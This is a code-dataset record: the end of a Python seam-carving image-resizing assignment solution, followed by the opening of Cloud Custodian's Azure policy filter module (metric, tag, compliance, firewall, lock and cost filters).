# Store the new seam with value i+1 in the image
# We can assert here that we are only writing on zeros (not overwriting existing seams)
assert np.all(seams[np.arange(H), indices[np.arange(H), seam]] == 0), \
"we are overwriting seams"
seams[np.arange(H), indices[np.arange(H), seam]] = i + 1
# We remove the indices used by the seam, so that `indices` keep the same shape as `image`
indices = rfunc(indices, seam)
if axis == 0:
seams = np.transpose(seams, (1, 0))
return seams
def enlarge(image, size, axis=1, efunc=energy_function, cfunc=compute_cost, dfunc=duplicate_seam, bfunc=backtrack_seam, rfunc=remove_seam):
"""Enlarges the size of the image by duplicating the low energy seams.
We start by getting the k seams to duplicate through function find_seams.
We iterate through these seams and duplicate each one iteratively.
SUPER IMPORTANT: IF YOU WANT TO PREVENT CASCADING ERRORS IN THE CODE OF enlarge(), USE FUNCTIONS:
- efunc (instead of energy_function)
- cfunc (instead of compute_cost)
- dfunc (instead of duplicate_seam)
- bfunc (instead of backtrack_seam)
- rfunc (instead of remove_seam)
- find_seams
Args:
image: numpy array of shape (H, W, C)
        size: size to increase height or width to (depending on axis)
axis: enlarge in width (axis=1) or height (axis=0)
efunc: energy function to use
cfunc: cost function to use
dfunc: duplicate seam function to use
bfunc: backtrack seam function to use
rfunc: remove seam function to use
Returns:
out: numpy array of shape (size, W, C) if axis=0, or (H, size, C) if axis=1
"""
out = np.copy(image)
# Transpose for height resizing
if axis == 0:
out = np.transpose(out, (1, 0, 2))
H, W, C = out.shape
    assert size > W, "size must be greater than %d" % W
assert size <= 2 * W, "size must be smaller than %d" % (2 * W)
### YOUR CODE HERE
energy = efunc(out)
cost, paths = cfunc(out, energy)
seams = find_seams(out, size-W, efunc=efunc, cfunc=cfunc, bfunc=bfunc, rfunc=rfunc) # (H, W)
    # Duplicate seams from right to left so earlier insertions do not shift the
    # original column indices of the seams that are still to be duplicated.
cur_index = W-1
while cur_index >= 0:
seam_id = seams[0, cur_index]
if seam_id != 0:
seam = np.where(seams == seam_id)[1]
out = dfunc(out, seam)
cur_index -= 1
### END YOUR CODE
if axis == 0:
out = np.transpose(out, (1, 0, 2))
return out
def compute_forward_cost(image, energy):
"""Computes forward cost map (vertical) and paths of the seams.
Starting from the first row, compute the cost of each pixel as the sum of energy along the
lowest energy path from the top.
Make sure to add the forward cost introduced when we remove the pixel of the seam.
We also return the paths, which will contain at each pixel either -1, 0 or 1 depending on
where to go up if we follow a seam at this pixel.
Args:
image: numpy array of shape (H, W, 3) or (H, W)
energy: numpy array of shape (H, W)
Returns:
cost: numpy array of shape (H, W)
paths: numpy array of shape (H, W) containing values -1, 0 or 1
"""
image = color.rgb2gray(image)
H, W = image.shape
cost = np.zeros((H, W))
paths = np.zeros((H, W), dtype=np.int)
# Initialization
cost[0] = energy[0]
for j in range(W):
if j > 0 and j < W - 1:
cost[0, j] += np.abs(image[0, j+1] - image[0, j-1])
paths[0] = 0 # we don't care about the first row of paths
### YOUR CODE HERE
# refer to this blog https://avikdas.com/2019/07/29/improved-seam-carving-with-forward-energy.html
# but energy of each location should also be included
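    # As implemented below, for an interior pixel (i, j) the candidates add the
    # cost of the new edges created when that pixel is removed:
    #   C_U(i, j) = |I(i, j-1) - I(i, j+1)|
    #   C_L(i, j) = C_U(i, j) + |I(i, j-1) - I(i-1, j)|
    #   C_R(i, j) = C_U(i, j) + |I(i, j)   - I(i-1, j+1)|
    # Each candidate also adds the pixel energy and the cumulative cost of the
    # matching predecessor (upper-left, above, upper-right); border columns get
    # infinity for moves that would leave the image.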
for i in range(1, H):
C_l = np.zeros(W)
C_u = np.zeros(W)
C_r = np.zeros(W)
C_u[1:-1] = np.abs(image[i, :-2]-image[i, 2:])
C_u = C_u + energy[i] + cost[i-1]
C_l[1:-1] = np.abs(image[i, :-2]-image[i, 2:]) + np.abs(image[i, :-2] - image[i-1, 1:-1])
C_l[-1] = np.abs(image[i, -2] - image[i-1, -1])
C_l[1:] = C_l[1:] + energy[i, 1:] + cost[i-1, :-1]
C_l[0] = float('inf')
C_r[1:-1] = np.abs(image[i, :-2]-image[i, 2:]) + np.abs(image[i, 1:-1] - image[i-1, 2:])
C_r[0] = np.abs(image[i, 0] - image[i-1, 1])
C_r[:-1] = C_r[:-1] + energy[i, :-1] + cost[i-1, 1:]
C_r[-1] = float('inf')
stacked_cost = np.stack((C_l, C_u, C_r), axis=0)
cost[i] = np.min(stacked_cost, axis=0)
paths[i] = np.argmin(stacked_cost, axis=0) - 1
### END YOUR CODE
# Check that paths only contains -1, 0 or 1
assert np.all(np.any([paths == 1, paths == 0, paths == -1], axis=0)), \
"paths contains other values than -1, 0 or 1"
return cost, paths
def reduce_fast(image, size, axis=1, efunc=energy_function, cfunc=compute_cost):
"""Reduces the size of the image using the seam carving process. Faster than `reduce`.
Use your own implementation (you can use auxiliary functions if it helps like `energy_fast`)
to implement a faster version of `reduce`.
Args:
image: numpy array of shape (H, W, C)
size: size to reduce height or width to (depending on axis)
axis: reduce in width (axis=1) or height (axis=0)
efunc: energy function to use
cfunc: cost function to use
Returns:
out: numpy array of shape (size, W, C) if axis=0, or (H, size, C) if axis=1
"""
out = np.copy(image)
if axis == 0:
out = np.transpose(out, (1, 0, 2))
H = out.shape[0]
W = out.shape[1]
assert W > size, "Size must be smaller than %d" % W
assert size > 0, "Size must be greater than zero"
### YOUR CODE HERE
for i in range(W-size):
energy = efunc(out)
cost, paths = cfunc(out, energy)
seam = backtrack_seam(paths, np.argmin(cost[-1]))
out = remove_seam(out, seam)
### END YOUR CODE
assert out.shape[1] == size, "Output doesn't have the right shape"
if axis == 0:
out = np.transpose(out, (1, 0, 2))
return out
def remove_object(image, mask):
"""Remove the object present in the mask.
Returns an output image with same shape as the input image, but without the object in the mask.
Args:
image: numpy array of shape (H, W, 3)
mask: numpy boolean array of shape (H, W)
Returns:
out: numpy array of shape (H, W, 3)
"""
assert image.shape[:2] == mask.shape
H, W, _ = image.shape
out = np.copy(image)
### YOUR CODE HERE
def energy_mask(image):
energy = energy_function(image)
energy[mask] = -100
return energy
def mask_remove_seam(image, seam):
out = remove_seam(image, seam)
nonlocal mask
mask = remove_seam(mask, seam)
return out
from scipy import ndimage
mask_box = ndimage.find_objects(mask)[0]
mask_h = mask_box[0].stop - mask_box[0].start + 1
mask_w = mask_box[1].stop - mask_box[1].start + 1
out = reduce(image, W-mask_w, 1, energy_mask, compute_cost, rfunc=mask_remove_seam)
out = enlarge(out, W, axis=1)
### END YOUR CODE
assert out.shape == image.shape
return out
| 32.266102 | 139 | 0.612281 |
ac25259cd7340f2f8478a12b051fd056fee988ad | 35,409 | py | Python | tools/c7n_azure/c7n_azure/filters.py | MehdiZonjy/cloud-custodian | 9185eda70c4ee4d14190e62290ecfdf229ef42ff | [
"Apache-2.0"
] | 2 | 2017-09-20T15:43:40.000Z | 2018-12-22T12:03:07.000Z | tools/c7n_azure/c7n_azure/filters.py | MehdiZonjy/cloud-custodian | 9185eda70c4ee4d14190e62290ecfdf229ef42ff | [
"Apache-2.0"
] | 2 | 2018-01-20T01:36:39.000Z | 2021-02-01T15:35:33.000Z | tools/c7n_azure/c7n_azure/filters.py | MehdiZonjy/cloud-custodian | 9185eda70c4ee4d14190e62290ecfdf229ef42ff | [
"Apache-2.0"
] | 3 | 2017-09-21T13:36:46.000Z | 2021-09-20T16:38:29.000Z | # Copyright 2015-2018 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import isodate
import operator
from abc import ABCMeta, abstractmethod
from concurrent.futures import as_completed
from datetime import timedelta
import six
from azure.mgmt.costmanagement.models import (QueryAggregation,
QueryComparisonExpression,
QueryDataset, QueryDefinition,
QueryFilter, QueryGrouping,
QueryTimePeriod, TimeframeType)
from azure.mgmt.policyinsights import PolicyInsightsClient
from c7n_azure.tags import TagHelper
from c7n_azure.utils import (IpRangeHelper, Math, ResourceIdParser,
StringUtils, ThreadHelper, now, utcnow, is_resource_group)
from dateutil.parser import parse
from msrest.exceptions import HttpOperationError
from c7n.filters import Filter, FilterValidationError, ValueFilter
from c7n.filters.core import PolicyValidationError
from c7n.filters.offhours import OffHour, OnHour, Time
from c7n.utils import chunks, get_annotation_prefix, type_schema
scalar_ops = {
'eq': operator.eq,
'equal': operator.eq,
'ne': operator.ne,
'not-equal': operator.ne,
'gt': operator.gt,
'greater-than': operator.gt,
'ge': operator.ge,
'gte': operator.ge,
'le': operator.le,
'lte': operator.le,
'lt': operator.lt,
'less-than': operator.lt
}
class MetricFilter(Filter):
"""
Filters Azure resources based on live metrics from the Azure monitor
Click `here
<https://docs.microsoft.com/en-us/azure/monitoring-and-diagnostics/monitoring-supported-metrics/>`_
for a full list of metrics supported by Azure resources.
:example:
Find all VMs with an average Percentage CPU greater than 75% over last 2 hours
.. code-block:: yaml
policies:
- name: vm-percentage-cpu
resource: azure.vm
filters:
- type: metric
metric: Percentage CPU
aggregation: average
op: gt
threshold: 75
timeframe: 2
:example:
Find KeyVaults with more than 1000 API hits in the last hour
.. code-block:: yaml
policies:
- name: keyvault-hits
resource: azure.keyvault
filters:
- type: metric
metric: ServiceApiHit
aggregation: total
op: gt
threshold: 1000
timeframe: 1
:example:
Find SQL servers with less than 10% average DTU consumption
across all databases over last 24 hours
.. code-block:: yaml
policies:
- name: dtu-consumption
resource: azure.sqlserver
filters:
- type: metric
metric: dtu_consumption_percent
aggregation: average
op: lt
threshold: 10
timeframe: 24
filter: "DatabaseResourceId eq '*'"
"""
DEFAULT_TIMEFRAME = 24
DEFAULT_INTERVAL = 'P1D'
DEFAULT_AGGREGATION = 'average'
aggregation_funcs = {
'average': Math.mean,
'total': Math.sum,
'count': Math.sum,
'minimum': Math.max,
'maximum': Math.min
}
schema = {
'type': 'object',
'required': ['type', 'metric', 'op', 'threshold'],
'additionalProperties': False,
'properties': {
'type': {'enum': ['metric']},
'metric': {'type': 'string'},
'op': {'enum': list(scalar_ops.keys())},
'threshold': {'type': 'number'},
'timeframe': {'type': 'number'},
'interval': {'enum': [
'PT1M', 'PT5M', 'PT15M', 'PT30M', 'PT1H', 'PT6H', 'PT12H', 'P1D']},
'aggregation': {'enum': ['total', 'average', 'count', 'minimum', 'maximum']},
'no_data_action': {'enum': ['include', 'exclude']},
'filter': {'type': 'string'}
}
}
schema_alias = True
def __init__(self, data, manager=None):
super(MetricFilter, self).__init__(data, manager)
# Metric name as defined by Azure SDK
self.metric = self.data.get('metric')
# gt (>), ge (>=), eq (==), le (<=), lt (<)
self.op = scalar_ops[self.data.get('op')]
# Value to compare metric value with self.op
self.threshold = self.data.get('threshold')
# Number of hours from current UTC time
self.timeframe = float(self.data.get('timeframe', self.DEFAULT_TIMEFRAME))
# Interval as defined by Azure SDK
self.interval = isodate.parse_duration(self.data.get('interval', self.DEFAULT_INTERVAL))
# Aggregation as defined by Azure SDK
self.aggregation = self.data.get('aggregation', self.DEFAULT_AGGREGATION)
# Aggregation function to be used locally
self.func = self.aggregation_funcs[self.aggregation]
# Used to reduce the set of metric data returned
self.filter = self.data.get('filter', None)
# Include or exclude resources if there is no metric data available
self.no_data_action = self.data.get('no_data_action', 'exclude')
def process(self, resources, event=None):
# Import utcnow function as it may have been overridden for testing purposes
from c7n_azure.utils import utcnow
# Get timespan
end_time = utcnow()
start_time = end_time - timedelta(hours=self.timeframe)
self.timespan = "{}/{}".format(start_time, end_time)
# Create Azure Monitor client
self.client = self.manager.get_client('azure.mgmt.monitor.MonitorManagementClient')
# Process each resource in a separate thread, returning all that pass filter
with self.executor_factory(max_workers=3) as w:
processed = list(w.map(self.process_resource, resources))
return [item for item in processed if item is not None]
def get_metric_data(self, resource):
cached_metric_data = self._get_cached_metric_data(resource)
if cached_metric_data:
return cached_metric_data['measurement']
try:
metrics_data = self.client.metrics.list(
self.get_resource_id(resource),
timespan=self.timespan,
interval=self.interval,
metricnames=self.metric,
aggregation=self.aggregation,
filter=self.get_filter(resource)
)
except HttpOperationError:
self.log.exception("Could not get metric: %s on %s" % (
self.metric, resource['id']))
return None
if len(metrics_data.value) > 0 and len(metrics_data.value[0].timeseries) > 0:
m = [getattr(item, self.aggregation)
for item in metrics_data.value[0].timeseries[0].data]
else:
m = None
self._write_metric_to_resource(resource, metrics_data, m)
return m
def get_resource_id(self, resource):
return resource['id']
def get_filter(self, resource):
return self.filter
def _write_metric_to_resource(self, resource, metrics_data, m):
resource_metrics = resource.setdefault(get_annotation_prefix('metrics'), {})
resource_metrics[self._get_metrics_cache_key()] = {
'metrics_data': metrics_data.as_dict(),
'measurement': m,
}
def _get_metrics_cache_key(self):
return "{}, {}, {}, {}, {}".format(
self.metric,
self.aggregation,
self.timeframe,
self.interval,
self.filter,
)
def _get_cached_metric_data(self, resource):
metrics = resource.get(get_annotation_prefix('metrics'))
if not metrics:
return None
return metrics.get(self._get_metrics_cache_key())
def passes_op_filter(self, resource):
m_data = self.get_metric_data(resource)
if m_data is None:
return self.no_data_action == 'include'
aggregate_value = self.func(m_data)
return self.op(aggregate_value, self.threshold)
def process_resource(self, resource):
return resource if self.passes_op_filter(resource) else None
DEFAULT_TAG = "custodian_status"
class TagActionFilter(Filter):
"""Filter resources for tag specified future action
Filters resources by a 'custodian_status' tag which specifies a future
date for an action.
The filter parses the tag values looking for an 'op@date'
    string. The date is parsed and compared to today's date; the
    filter succeeds if today's date is greater than or equal to the target date.
The optional 'skew' parameter provides for incrementing today's
date a number of days into the future. An example use case might
be sending a final notice email a few days before terminating an
instance, or snapshotting a volume prior to deletion.
The optional 'skew_hours' parameter provides for incrementing the current
time a number of hours into the future.
    Optionally, the 'tz' parameter can be used to specify the timezone
in which to interpret the clock (default value is 'utc')
:example:
.. code-block :: yaml
policies:
- name: vm-stop-marked
resource: azure.vm
filters:
- type: marked-for-op
# The default tag used is custodian_status
# but that is configurable
tag: custodian_status
op: stop
# Another optional tag is skew
tz: utc
"""
schema = type_schema(
'marked-for-op',
tag={'type': 'string'},
tz={'type': 'string'},
skew={'type': 'number', 'minimum': 0},
skew_hours={'type': 'number', 'minimum': 0},
op={'type': 'string'})
schema_alias = True
current_date = None
log = logging.getLogger('custodian.azure.filters.TagActionFilter')
def validate(self):
op = self.data.get('op')
if self.manager and op not in self.manager.action_registry.keys():
raise PolicyValidationError(
"Invalid marked-for-op op:%s in %s" % (op, self.manager.data))
tz = Time.get_tz(self.data.get('tz', 'utc'))
if not tz:
raise PolicyValidationError(
"Invalid timezone specified '%s' in %s" % (
self.data.get('tz'), self.manager.data))
return self
def process(self, resources, event=None):
self.tag = self.data.get('tag', DEFAULT_TAG)
self.op = self.data.get('op', 'stop')
self.skew = self.data.get('skew', 0)
self.skew_hours = self.data.get('skew_hours', 0)
self.tz = Time.get_tz(self.data.get('tz', 'utc'))
return super(TagActionFilter, self).process(resources, event)
def __call__(self, i):
v = i.get('tags', {}).get(self.tag, None)
if v is None:
return False
if ':' not in v or '@' not in v:
return False
msg, tgt = v.rsplit(':', 1)
action, action_date_str = tgt.strip().split('@', 1)
if action != self.op:
return False
try:
action_date = parse(action_date_str)
except Exception:
self.log.error("could not parse tag:%s value:%s on %s" % (
self.tag, v, i['InstanceId']))
return False
# current_date must match timezones with the parsed date string
if action_date.tzinfo:
action_date = action_date.astimezone(self.tz)
current_date = now(tz=self.tz)
else:
current_date = now()
return current_date >= (
action_date - timedelta(days=self.skew, hours=self.skew_hours))
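# Illustrative (hypothetical) tag value matched by the filter above. The value
# must follow the "<message>: <op>@<date>" convention, e.g.
#   custodian_status = "Resource does not meet policy: stop@2021/09/01"
# which matches a marked-for-op filter with op: stop once the current date
# (plus any configured skew) reaches 2021/09/01.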
class DiagnosticSettingsFilter(ValueFilter):
"""The diagnostic settings filter is implicitly just the ValueFilter
on the diagnostic settings for an azure resource.
:example:
Find Load Balancers that have logs for both LoadBalancerProbeHealthStatus category and
LoadBalancerAlertEvent category enabled.
The use of value_type: swap is important for these examples because it swaps the value
and the evaluated key so that it evaluates the value provided is in the logs.
.. code-block:: yaml
policies
- name: find-load-balancers-with-logs-enabled
resource: azure.loadbalancer
filters:
- type: diagnostic-settings
key: logs[?category == 'LoadBalancerProbeHealthStatus'][].enabled
value: True
op: in
value_type: swap
- type: diagnostic-settings
key: logs[?category == 'LoadBalancerAlertEvent'][].enabled
value: True
op: in
value_type: swap
:example:
Find KeyVaults that have logs enabled for the AuditEvent category.
.. code-block:: yaml
policies
- name: find-keyvaults-with-logs-enabled
resource: azure.keyvault
filters:
- type: diagnostic-settings
key: logs[?category == 'AuditEvent'][].enabled
value: True
op: in
value_type: swap
"""
schema = type_schema('diagnostic-settings', rinherit=ValueFilter.schema)
schema_alias = True
log = logging.getLogger('custodian.azure.filters.DiagnosticSettingsFilter')
def process(self, resources, event=None):
futures = []
results = []
# Process each resource in a separate thread, returning all that pass filter
with self.executor_factory(max_workers=3) as w:
for resource_set in chunks(resources, 20):
futures.append(w.submit(self.process_resource_set, resource_set))
for f in as_completed(futures):
if f.exception():
self.log.warning(
"Diagnostic settings filter error: %s" % f.exception())
continue
else:
results.extend(f.result())
return results
def process_resource_set(self, resources):
#: :type: azure.mgmt.monitor.MonitorManagementClient
client = self.manager.get_client('azure.mgmt.monitor.MonitorManagementClient')
matched = []
for resource in resources:
settings = client.diagnostic_settings.list(resource['id'])
settings = [s.as_dict() for s in settings.value]
filtered_settings = super(DiagnosticSettingsFilter, self).process(settings, event=None)
if filtered_settings:
matched.append(resource)
return matched
class PolicyCompliantFilter(Filter):
"""Filter resources based on Azure Policy compliance status
Filter resources by their current Azure Policy compliance status.
You can specify if you want to filter compliant or non-compliant resources.
You can provide a list of Azure Policy definitions display names or names to limit
amount of non-compliant resources. By default it returns a list of all non-compliant
resources.
.. code-block :: yaml
policies:
- name: non-compliant-vms
resource: azure.vm
filters:
- type: policy-compliant
compliant: false
definitions:
- "Definition display name 1"
- "Definition display name 2"
"""
schema = type_schema('policy-compliant', required=['type', 'compliant'],
compliant={'type': 'boolean'},
definitions={'type': 'array'})
schema_alias = True
def __init__(self, data, manager=None):
super(PolicyCompliantFilter, self).__init__(data, manager)
self.compliant = self.data['compliant']
self.definitions = self.data.get('definitions')
def process(self, resources, event=None):
s = self.manager.get_session()
definition_ids = None
# Translate definitions display names into ids
if self.definitions:
policyClient = s.client("azure.mgmt.resource.policy.PolicyClient")
definitions = [d for d in policyClient.policy_definitions.list()]
definition_ids = [d.id.lower() for d in definitions
if d.display_name in self.definitions or
d.name in self.definitions]
# Find non-compliant resources
client = PolicyInsightsClient(s.get_credentials())
query = client.policy_states.list_query_results_for_subscription(
policy_states_resource='latest', subscription_id=s.subscription_id).value
non_compliant = [f.resource_id.lower() for f in query
if not definition_ids or f.policy_definition_id.lower() in definition_ids]
if self.compliant:
return [r for r in resources if r['id'].lower() not in non_compliant]
else:
return [r for r in resources if r['id'].lower() in non_compliant]
class AzureOffHour(OffHour):
# Override get_tag_value because Azure stores tags differently from AWS
def get_tag_value(self, i):
tag_value = TagHelper.get_tag_value(resource=i,
tag=self.tag_key,
utf_8=True)
if tag_value is not False:
tag_value = tag_value.lower().strip("'\"")
return tag_value
class AzureOnHour(OnHour):
# Override get_tag_value because Azure stores tags differently from AWS
def get_tag_value(self, i):
tag_value = TagHelper.get_tag_value(resource=i,
tag=self.tag_key,
utf_8=True)
if tag_value is not False:
tag_value = tag_value.lower().strip("'\"")
return tag_value
@six.add_metaclass(ABCMeta)
class FirewallRulesFilter(Filter):
"""Filters resources by the firewall rules
Rules can be specified as x.x.x.x-y.y.y.y or x.x.x.x or x.x.x.x/y.
With the exception of **equal** all modes reference total IP space and ignore
specific notation.
**include**: True if all IP space listed is included in firewall.
**any**: True if any overlap in IP space exists.
**only**: True if firewall IP space only includes IPs from provided space
(firewall is subset of provided space).
**equal**: the list of IP ranges or CIDR that firewall rules must match exactly.
**IMPORTANT**: this filter ignores all bypass rules. If you want to ensure your resource is
not available for other Azure Cloud services or from the Portal, please use ``firewall-bypass``
filter.
:example:
.. code-block:: yaml
policies:
- name: servers-with-firewall
resource: azure.sqlserver
filters:
- type: firewall-rules
include:
- '131.107.160.2-131.107.160.3'
- 10.20.20.0/24
"""
schema = {
'type': 'object',
'additionalProperties': False,
'properties': {
'type': {'enum': ['firewall-rules']},
'include': {'type': 'array', 'items': {'type': 'string'}},
'any': {'type': 'array', 'items': {'type': 'string'}},
'only': {'type': 'array', 'items': {'type': 'string'}},
'equal': {'type': 'array', 'items': {'type': 'string'}}
},
'oneOf': [
{"required": ["type", "include"]},
{"required": ["type", "any"]},
{"required": ["type", "only"]},
{"required": ["type", "equal"]}
]
}
schema_alias = True
log = logging.getLogger('custodian.azure.filters.FirewallRulesFilter')
def __init__(self, data, manager=None):
super(FirewallRulesFilter, self).__init__(data, manager)
self.policy_include = None
self.policy_equal = None
self.policy_any = None
self.policy_only = None
self.client = None
def process(self, resources, event=None):
self.policy_include = IpRangeHelper.parse_ip_ranges(self.data, 'include')
self.policy_equal = IpRangeHelper.parse_ip_ranges(self.data, 'equal')
self.policy_any = IpRangeHelper.parse_ip_ranges(self.data, 'any')
self.policy_only = IpRangeHelper.parse_ip_ranges(self.data, 'only')
self.client = self.manager.get_client()
result, _ = ThreadHelper.execute_in_parallel(
resources=resources,
event=event,
execution_method=self._check_resources,
executor_factory=self.executor_factory,
log=self.log
)
return result
def _check_resources(self, resources, event):
return [r for r in resources if self._check_resource(r)]
@abstractmethod
def _query_rules(self, resource):
"""
Queries firewall rules for a resource. Override in concrete classes.
:param resource:
:return: A set of netaddr.IPSet with rules defined for the resource.
"""
raise NotImplementedError()
def _check_resource(self, resource):
resource_rules = self._query_rules(resource)
ok = self._check_rules(resource_rules)
return ok
def _check_rules(self, resource_rules):
if self.policy_equal is not None:
return self.policy_equal == resource_rules
elif self.policy_include is not None:
return self.policy_include.issubset(resource_rules)
elif self.policy_any is not None:
return not self.policy_any.isdisjoint(resource_rules)
elif self.policy_only is not None:
return resource_rules.issubset(self.policy_only)
else: # validated earlier, can never happen
raise FilterValidationError("Internal error.")
@six.add_metaclass(ABCMeta)
class FirewallBypassFilter(Filter):
"""Filters resources by the firewall bypass rules
"""
@staticmethod
def schema(values):
return type_schema(
'firewall-bypass',
required=['mode', 'list'],
**{
'mode': {'enum': ['include', 'equal', 'any', 'only']},
'list': {'type': 'array', 'items': {'enum': values}}
})
log = logging.getLogger('custodian.azure.filters.FirewallRulesFilter')
def __init__(self, data, manager=None):
super(FirewallBypassFilter, self).__init__(data, manager)
self.mode = self.data['mode']
self.list = set(self.data['list'])
self.client = None
def process(self, resources, event=None):
self.client = self.manager.get_client()
result, _ = ThreadHelper.execute_in_parallel(
resources=resources,
event=event,
execution_method=self._check_resources,
executor_factory=self.executor_factory,
log=self.log
)
return result
def _check_resources(self, resources, event):
return [r for r in resources if self._check_resource(r)]
@abstractmethod
def _query_bypass(self, resource):
"""
        Queries firewall bypass settings for a resource. Override in concrete classes.
        :param resource:
        :return: An iterable of firewall bypass values defined for the resource.
"""
raise NotImplementedError()
def _check_resource(self, resource):
bypass_set = set(self._query_bypass(resource))
ok = self._check_bypass(bypass_set)
return ok
def _check_bypass(self, bypass_set):
if self.mode == 'equal':
return self.list == bypass_set
elif self.mode == 'include':
return self.list.issubset(bypass_set)
elif self.mode == 'any':
return not self.list.isdisjoint(bypass_set)
elif self.mode == 'only':
return bypass_set.issubset(self.list)
else: # validated earlier, can never happen
raise FilterValidationError("Internal error.")
class ResourceLockFilter(Filter):
"""
Filter locked resources.
Lock can be of 2 types: ReadOnly and CanNotDelete. To filter any lock, use "Any" type.
Lock type is optional, by default any lock will be applied to the filter.
To get unlocked resources, use "Absent" type.
:example:
Get all keyvaults with ReadOnly lock:
.. code-block :: yaml
policies:
- name: locked-keyvaults
resource: azure.keyvault
filters:
- type: resource-lock
lock-type: ReadOnly
:example:
Get all locked sqldatabases (any type of lock):
.. code-block :: yaml
policies:
- name: locked-sqldatabases
resource: azure.sqldatabase
filters:
- type: resource-lock
:example:
Get all unlocked resource groups:
.. code-block :: yaml
policies:
- name: unlock-rgs
resource: azure.resourcegroup
filters:
- type: resource-lock
lock-type: Absent
"""
schema = type_schema(
'resource-lock', required=['type'],
**{
'lock-type': {'enum': ['ReadOnly', 'CanNotDelete', 'Any', 'Absent']},
})
schema_alias = True
log = logging.getLogger('custodian.azure.filters.ResourceLockFilter')
def __init__(self, data, manager=None):
super(ResourceLockFilter, self).__init__(data, manager)
self.lock_type = self.data.get('lock-type', 'Any')
def process(self, resources, event=None):
resources, exceptions = ThreadHelper.execute_in_parallel(
resources=resources,
event=event,
execution_method=self._process_resource_set,
executor_factory=self.executor_factory,
log=self.log
)
if exceptions:
raise exceptions[0]
return resources
def _process_resource_set(self, resources, event=None):
client = self.manager.get_client('azure.mgmt.resource.locks.ManagementLockClient')
result = []
for resource in resources:
if is_resource_group(resource):
locks = [r.serialize(True) for r in
client.management_locks.list_at_resource_group_level(
resource['name'])]
else:
locks = [r.serialize(True) for r in client.management_locks.list_at_resource_level(
resource['resourceGroup'],
ResourceIdParser.get_namespace(resource['id']),
ResourceIdParser.get_resource_name(resource.get('c7n:parent-id')) or '',
ResourceIdParser.get_resource_type(resource['id']),
resource['name'])]
if StringUtils.equal('Absent', self.lock_type) and not locks:
result.append(resource)
else:
for lock in locks:
if StringUtils.equal('Any', self.lock_type) or \
StringUtils.equal(lock['properties']['level'], self.lock_type):
result.append(resource)
break
return result
class CostFilter(ValueFilter):
"""
Filter resources by the cost consumed over a timeframe.
    Total cost for the resource includes costs for all of its child resources if billed
    separately (e.g. SQL Server and SQL Server Databases). A warning is logged if we detect
different currencies.
Timeframe options:
- Number of days before today
- All days in current calendar period until today:
- ``WeekToDate``
- ``MonthToDate``
- ``YearToDate``
- All days in the previous calendar period:
- ``TheLastWeek``
- ``TheLastMonth``
- ``TheLastYear``
:examples:
    SQL servers that cost more than 2000 in the last month.
.. code-block:: yaml
policies:
- name: expensive-sql-servers-last-month
resource: azure.sqlserver
filters:
- type: cost
timeframe: TheLastMonth
op: gt
value: 2000
    SQL servers that cost more than 2000 in the last 30 days, not including today.
.. code-block:: yaml
policies:
- name: expensive-sql-servers
resource: azure.sqlserver
filters:
- type: cost
timeframe: 30
op: gt
value: 2000
"""
preset_timeframes = [i.value for i in TimeframeType if i.value != 'Custom']
schema = type_schema('cost',
rinherit=ValueFilter.schema,
required=['timeframe'],
key=None,
**{
'timeframe': {
'oneOf': [
{'enum': preset_timeframes},
{"type": "number", "minimum": 1}
]
}
})
schema_alias = True
log = logging.getLogger('custodian.azure.filters.CostFilter')
def __init__(self, data, manager=None):
data['key'] = 'PreTaxCost' # can also be Currency, but now only PreTaxCost is supported
super(CostFilter, self).__init__(data, manager)
self.cached_costs = None
def __call__(self, i):
if not self.cached_costs:
self.cached_costs = self._query_costs()
id = i['id'].lower() + "/"
costs = [k.copy() for k in self.cached_costs if (k['ResourceId'] + '/').startswith(id)]
if not costs:
return False
if any(c['Currency'] != costs[0]['Currency'] for c in costs):
self.log.warning('Detected different currencies for the resource {0}. Costs array: {1}'
.format(i['id'], costs))
total_cost = {
'PreTaxCost': sum(c['PreTaxCost'] for c in costs),
'Currency': costs[0]['Currency']
}
i[get_annotation_prefix('cost')] = total_cost
result = super(CostFilter, self).__call__(total_cost)
return result
def fix_wrap_rest_response(self, data):
"""
Azure REST API doesn't match the documentation and the python SDK fails to deserialize
the response.
        This is a temporary workaround that converts the response into the correct form.
        :param data: partially deserialized response that doesn't match the spec.
        :return: partially deserialized response that does match the spec.
"""
type = data.get('type', None)
if type != 'Microsoft.CostManagement/query':
return data
data['value'] = [data]
data['nextLink'] = data['properties']['nextLink']
return data
def _query_costs(self):
manager = self.manager
is_resource_group = manager.type == 'resourcegroup'
client = manager.get_client('azure.mgmt.costmanagement.CostManagementClient')
aggregation = {'totalCost': QueryAggregation(name='PreTaxCost')}
grouping = [QueryGrouping(type='Dimension',
name='ResourceGroupName' if is_resource_group else 'ResourceId')]
query_filter = None
if not is_resource_group:
query_filter = QueryFilter(
dimension=QueryComparisonExpression(name='ResourceType',
operator='In',
values=[manager.resource_type.resource_type]))
if 'dimension' in query_filter._attribute_map:
query_filter._attribute_map['dimension']['key'] = 'dimensions'
dataset = QueryDataset(grouping=grouping, aggregation=aggregation, filter=query_filter)
timeframe = self.data['timeframe']
time_period = None
if timeframe not in CostFilter.preset_timeframes:
end_time = utcnow().replace(hour=0, minute=0, second=0, microsecond=0)
start_time = end_time - timedelta(days=timeframe)
timeframe = 'Custom'
time_period = QueryTimePeriod(from_property=start_time, to=end_time)
definition = QueryDefinition(timeframe=timeframe, time_period=time_period, dataset=dataset)
subscription_id = manager.get_session().get_subscription_id()
scope = '/subscriptions/' + subscription_id
query = client.query.usage_by_scope(scope, definition)
if hasattr(query, '_derserializer'):
original = query._derserializer._deserialize
query._derserializer._deserialize = lambda target, data: \
original(target, self.fix_wrap_rest_response(data))
result_list = list(query)[0]
result_list = [{result_list.columns[i].name: v for i, v in enumerate(row)}
for row in result_list.rows]
for r in result_list:
if 'ResourceGroupName' in r:
r['ResourceId'] = scope + '/resourcegroups/' + r.pop('ResourceGroupName')
r['ResourceId'] = r['ResourceId'].lower()
return result_list
class ParentFilter(Filter):
"""
Meta filter that allows you to filter child resources by applying filters to their
parent resources.
You can use any filter supported by corresponding parent resource type.
:examples:
Find Azure KeyVault Keys from Key Vaults with ``owner:ProjectA`` tag.
.. code-block:: yaml
policies:
- name: kv-keys-from-tagged-keyvaults
resource: azure.keyvault-key
filters:
